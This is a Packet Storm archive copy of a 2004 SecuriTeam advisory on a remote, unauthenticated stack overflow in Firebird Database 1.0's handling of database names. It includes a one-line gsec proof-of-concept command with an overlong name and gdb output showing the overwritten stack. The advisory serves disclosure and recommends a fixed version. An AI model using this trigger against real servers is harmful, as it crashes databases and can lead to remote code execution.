exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

firebirdDB.txt

firebirdDB.txt
Posted Jun 2, 2004
Authored by Noam Rathaus | Site SecuriTeam.com

A vulnerability in the Firebird Database's way of handling database names allows an unauthenticated user to cause the server to crash and overwrite a critical section of the stack used by the database. Version 1.0 is affected.

tags | advisory
SHA-256 | c4240f2e5fca1c1e74d84909a2142bb24a8cd2e298ffca0177b22046c5fb6e9e

firebirdDB.txt

Change Mirror Download
 Firebird Database Remote Database Name Overflow
------------------------------------------------------------------------

Article reference:
http://www.securiteam.com/unixfocus/5AP0P0UCUO.html


SUMMARY

<http://firebird.sourceforge.net> Firebird is "a relational database offering
many ANSI SQL-92 features that runs on Linux, Windows, and a variety of Unix
platforms. Firebird offers excellent concurrency, high performance, and
powerful language support for stored procedures and triggers. It has been
used in production systems, under a variety of names since 1981".

A vulnerability in Firebird Database's way of handling database names, allows
an unauthenticated user to cause the server to crash, and overwrite critical
section of the stack used by the database.

DETAILS

Vulnerable Systems:
* Firebird Database version 1.0 (1.0.2-2.1) - Debian unstable

Immune Systems:
* Firebird Database version 1.5.0 (others are presumed to be immune as well)


By issuing:
gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever
-password whatever

On a remote server, you can see that:
gdb /usr/lib/firebird/bin/ibserver
GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, Inc. GDB is
free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute copies of it
under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-linux"...(no debugging symbols
found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".

(gdb) r
Starting program: /usr/lib/firebird/bin/ibserver
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[Thread
debugging using libthread_db enabled]
[New Thread 1075462272 (LWP 31389)]
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[New
Thread 1092549552 (LWP 31392)]
[New Thread 1100938160 (LWP 31393)]
[Thread 1100938160 (LWP 31393) exited]
[Thread 1092549552 (LWP 31392) exited]
[New Thread 1092549552 (LWP 31396)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1092549552 (LWP 31396)]
0x08132223 in ERR_post ()


(gdb) bt
#0 0x08132223 in ERR_post ()
#1 0x080942ac in THD_wlck_unlock ()
#2 0x41414141 in ?? ()
#3 0x41414141 in ?? ()
#4 0x41414141 in ?? ()
#5 0x41414141 in ?? ()
#6 0x41414141 in ?? ()
#7 0x41414141 in ?? ()
#8 0x00414141 in ?? ()
#9 0x0000012c in ?? ()
..

Solution:
Debian is currently not maintaining this version of the product, so it is
recommended that you use a source code based installation.


ADDITIONAL INFORMATION

The information has been provided by <mailto:expert@securiteam.com> Noam
Rathaus.


Regards,
Aviram Jenik
Beyond Security Ltd.

http://www.BeyondSecurity.com
http://www.SecuriTeam.com

The First Integrated Network and Web Application Vulnerability Scanner:
http://www.beyondsecurity.com/webscan-wp.pdf




====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close